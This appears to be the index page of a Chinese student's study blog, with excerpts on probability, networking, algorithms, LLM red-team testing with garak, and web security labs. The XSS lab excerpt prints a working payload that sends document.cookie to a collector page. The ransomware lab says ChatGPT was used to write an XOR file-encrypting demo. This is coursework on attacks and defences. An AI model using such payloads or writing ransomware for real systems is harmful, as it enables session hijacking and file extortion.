Moyuan's website

一、核心概念的”通俗翻译”在进入具体分布之前，必须先在脑海中建立这两个指标的直觉： 概率密度 $f(x)$ 或分布律 $P(X=k)$：某一瞬间/某一特定结果发生的“瞬时几率”或“绝对高度”。 分布函数 $F(x)$：事情发生的“进度条”。它代表从开始一直累积到 $x$ 时刻，事情已经发生的总体概率。它永远是一条从 0 爬升到 1 的曲线。 二、”时空双煞”：泊松分布与指数分布这是考研中最常考、也最容易混淆的一对，它们其实是同一枚硬币的正反面。 1. 泊松分布 $P(\lambda)$ —— 数的是“个数” 物理意义：在一个固定的时间段或空间区域内，某种罕见事件发生的次数。 生活场景：一家奶茶店 1 小时内进来的客人数；一本书 100 页里出现的错别字数；一段公路上 1 个月内发生的车祸数。 参数 $\lambda$ 的直觉：平均强度（预期发生次数）。 数学奇迹：$E(X) = D(X) = \lambda$。这说明，事情发生的平均频率越高（$\lambda$ 越大），其波动的剧烈程度（方差）也同比例放大。一天平均卖 2 杯奶茶的店，某天卖了 5 杯叫“爆单”；一天平均卖 1...

一、 概念与简答题（数据结构与计算机网络）1. 简述二叉排序树（Binary Sort Tree）的相关概念与操作，以及稀疏矩阵的常用压缩存储方式 。 2. 简述局域网的相关特性与工作原理。 3. 简述密码体制中“密钥”的概念 。 4. 在网络寻址中，请比较数据报服务与虚电路服务的异同 相同点： 交换方式： 两者都属于分组交换（Packet Switching）技术，即将长报文拆分成若干个较短的分组进行转发。 资源共享： 都采用动态分配带宽的方式，通过统计时分复用提高线路利用率。 不同点（如下表所示）： 比较维度 数据报服务 (Datagram) 虚电路服务 (Virtual Circuit) 连接性 无连接。发送前无需建立连接。 面向连接。发送前必须建立连接。 目标地址 每个分组携带完整的目标地址。 分组仅携带短小的虚电路号 (VCI)。 路由选择 每个分组独立选择路由。 仅在建立连接时确定路径，后续不变。 分组顺序 不保证按序到达，可能乱序或丢失。 保证分组按发送顺序到达。 节点状态 路由器不维护连接状态（无状态）。 路由器需维护虚电...

Floyd-Warshall（弗洛伊德）算法 考研笔记一、算法概述1.1 核心思想Floyd算法是一种多源最短路径算法，基于动态规划思想，用于求解图中任意两个顶点之间的最短路径。 核心原理： 通过逐次引入每个顶点 k 作为”中间节点”，不断更新所有顶点对 (i, j) 之间的最短路径长度。 状态转移： 初始状态 D⁰： 只允许直接路径（邻接矩阵） 第k次迭代 Dᵏ： D$i$$j$ 表示从 i 到 j 只允许经过集合 {1, 2, …, k} 中的顶点作为中间节点的最短路径长度 最终状态 Dⁿ： 任意两点间的最短路径值 1.2 算法特点 特性 描述 算法类型 多源最短路径，动态规划 时间复杂度 O(V³)，三层循环 空间复杂度 O(V²)，需存储距离矩阵和路径矩阵 适用图 有向图、无向图均可 权值限制 可处理负权边，但不能处理负权环 优点 代码简洁，一次运行得到所有顶点对最短路径 缺点 时间复杂度高，不适合顶点数很多的图 二、算法步骤详解2.1 第一步：初始化邻接矩阵建议： 在每个元素下方添加角标（便于路径追溯） 初始角标格式： ...

卡特兰数卡塔兰数（Catalan number）是一个在组合数学中非常重要的数列，广泛应用于多种结构的计数问题。卡塔兰数的第 n 项通常用 $C_n$ 表示，表示可以由 n 个节点构成的不同二叉树的个数，也可以表示其它多种组合结构的数量。 卡塔兰数的定义卡塔兰数的第 n 项可以通过以下递推公式或闭式公式来计算： 递推公式： C_0 = 1 C_n = \sum_{i=0}^{n-1} C_i C_{n-i-1} \quad \text{(其中，} n \geq 1\text{)}这个递推公式表达了卡塔兰数的结构：假设我们想构造一个有 n 个节点的二叉树，可以先选定一个根节点，剩下的 n-1 个节点可以分为左右子树，左子树有 i 个节点，右子树有 n-i-1 个节点，于是根节点两边的子树的不同构造方法分别是 $Ci$ 和 $C{n-i-1}$。 闭式公式： C_n = \frac{1}{n+1} \binom{2n}{n} = \frac{(2n)!}{(n+1)!n!}这个公式表达了卡塔兰数的一种常见计算方式。 卡塔兰数的应用卡塔兰数在组合数学中有着丰富的应用，例如：...

1. 本次工作内容 OpenAI 兼容接口直连验证：验证了 GET /v1/models 和 POST /v1/chat/completions 基于 garak 的 lmrc 风险评估测试：改造出 One API 版本测试脚本，对 lmrc 子集 probe 进行了实际运行 安全工具链调研：对比分析 cli-anything-yakit、Yakit 官方平台、hexstrike-ai MCP 三者的功能与定位 MCP 封装实践：学习 MCP 协议与 Python SDK（FastMCP），将 cli-anything-yakit 封装为 MCP Server，注册到 Claude Code 2. 测试环境 测试工具：garak v0.14.1 Python 环境：3.11.7（Anaconda） MCP SDK：mcp 1.27.0（需 Python ≥ 3.10） 底层依赖：cli-anything-yakit + Yak gRPC 引擎 3. 主要测试结果3.1 One API 兼容性验证 /v1/models：HTTP 200，接口可用，鉴权正常 /v1/chat/c...

计算机网络考研核心公式笔记 (完整汇总版)第一章：概述与基础 速率 (Rate) 单位换算： 1 \text{ kbps} = 10^3 \text{ bps} \quad (k = 10^3) 1 \text{ Mbps} = 10^6 \text{ bps} \quad (M = 10^6) 1 \text{ Gbps} = 10^9 \text{ bps} \quad (G = 10^9) 时延 (Delay) 总时延 (Total Delay): D_{总} = D_{发送} + D_{传播} + D_{处理} + D_{排队} 发送时延 (Transmission Delay)：也称传输时延，是将数据从主机/路由器推向链路所需的时间。 D_{发送} = \frac{\text{数据块长度 (bit)}}{\text{信道带宽 (bit/s)}} 传播时延 (Propagation Delay)：电磁波在信道中传播一定距离所需的时间。 D_{传播} = \frac{\text{信道长度 (m)}}{\text{电磁波在信道上的传播速率 (m/s)}}注：在...

Web安全技术与应用期末复习资料题型分布 填空题：（2*10） 判断题：（2*10) 问答题：（60) 4/5 复习建议 熟记相关定义的英文缩写及中文名称，确保对各类概念有清晰理解。 第一篇 预备知识项目1 Web 服务器平台安装与配置 原理：搭建一个基本的 Web 服务器平台，包括操作系统 (Windows Server 2008)、Web 服务器 (Apache)、数据库 (MySQL) 和服务器端编程语言 (PHP)。 概念：Web 服务器平台、操作系统、Web 服务器软件、数据库、服务器端编程语言、Web 开发基础 (HTML、CSS、JavaScript、PHP)。 常见服务器操作系统 Windows Server Linux/Unix 主要Web服务器及市场占有率 Apache：47.0% Nginx：37.7% Microsoft IIS：10.0% Apache优势 开源、免费 强大的社区支持 关系型数据库管理系统（RDBMS） Oracle, Microsoft SQL Server, IBM DB2, MySQL, PostgreSQL ...

实验报告：基于勒索病毒、机器学习和深度学习的恶意程序检测研究实验背景随着信息技术的迅猛发展，计算机病毒的种类和数量不断增加，给信息安全带来了严峻挑战。传统的病毒检测方法主要依赖特征码和启发式分析，但在应对新型和变种病毒时效果有限。机器学习和深度学习作为现代人工智能的重要分支，提供了新的解决方案。恶意程序是网络安全的重要威胁，其中勒索病毒尤为严重，通过加密受害者文件索取赎金。本实验分三个部分： 设计一个简单的勒索病毒Demo，了解恶意程序的基本行为。 利用机器学习方法检测恶意程序。 利用深度学习方法检测并分类恶意程序。 第一部分：勒索病毒Demo设计实验目的利用ChatGPT实现一个勒索病毒的简化模型，模拟文件加密与解密流程，探究恶意程序的行为特征。 技术实现 加密功能： 遍历当前目录及子目录中的所有文件。 使用简单的异或加密算法(XOR)加密文件内容，并将加密后的文件扩展名改为.exe。 删除原始文件，保留加密后的文件。 解密功能： 遍历加密文件，使用相同的XOR解密逻辑还原原始文件。 删除加密文件，恢复文件原始状态。 代码逻辑 文件遍历：使用Windows API...

CSRF攻击与防护1. 背景与原理1.1 CSRF攻击定义 CSRF（Cross Site Request Forgery，跨站请求伪造）是一种利用用户身份权限的攻击方式。 攻击者诱导已登录目标网站的用户访问含有恶意代码的页面，伪造用户的合法请求，执行未授权操作。 1.2 CSRF攻击的原理 浏览器的同源策略允许同源的网页共享Cookie，但攻击者可以利用此策略： 用户登录目标网站后，浏览器保存Cookie。 用户访问恶意页面时，页面中的恶意代码通过伪造请求，利用用户Cookie向目标网站发送恶意请求。 1.3 CSRF攻击的危害 在用户毫不知情的情况下： 窃取用户信息。 未经授权的资金转移。 操作敏感的账户功能。 2. 项目任务概述实验通过创建两个网站（目标网站和攻击网站），模拟CSRF攻击并探讨防护措施。具体任务如下： 建立一个具有用户添加功能的目标网站（存在CSRF漏洞）。 创建一个模拟CSRF攻击的网站。 测试目标网站是否可以被CSRF攻击。 通过HTTP Referer验证和操作确认对话框两种方式防护CSRF攻击。 3. 实验过程3.1 任务1：建...

XSS跨站攻击与Cookie验证欺骗实验一、实验目的 研究并实践XSS攻击的原理与实现方式。 实现通过XSS攻击获取网页地址、User-Agent及Cookie的方法。 提交实验代码与报告，验证攻击与防护效果。 二、XSS跨站攻击实现细节1. 基本原理XSS是一种通过注入恶意代码在用户浏览器中执行非授权操作的攻击方式。主要分为： 持久型XSS：恶意代码存储在服务器，能长期触发。 非持久型XSS：恶意代码不存储，依赖特定URL。 2. 利用XSS攻击Cookie验证通过XSS脚本，将目标用户的Cookie发送至攻击者控制的服务器，绕过正常验证实现欺骗。 代码示例：在留言表单中插入： 1<a href="#" onclick="document.location='http://localhost/getsession/savesession.php?cookie='+escape(document.cookie);">Click Me</a> 当管理员点击链接时，document.cook...